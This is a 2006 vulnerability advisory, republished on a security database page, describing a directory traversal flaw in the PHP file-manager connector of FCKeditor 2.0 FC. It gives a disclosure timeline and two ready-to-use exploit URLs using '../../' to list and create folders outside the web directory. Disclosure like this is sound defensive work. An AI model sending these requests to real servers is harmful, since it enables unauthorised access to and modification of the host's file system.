Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11560
HistoryFeb 24, 2006 - 12:00 a.m.

NSA Group Security Advisory NSAG-№195-23.02.2006 Vulnerability FCKeditor 2.0 FC

2006-02-2400:00:00
vulners.com
7
JSON

Advisory:
NSAG-№195-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
FCKeditor 2.0 FC

Site of manufacturer:
http://www.fckeditor.net

The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/952.html

Risk:
Hide

Description:
The output for limits of a virtual directory is possible.

Influence:
Listing of directories, creation of folders outside a virtual directory.

Exploit:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAME

Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!

www.nsag.ru
«Nemesis» © 2006

Nemesis Security Audit Group © 2006.

JSON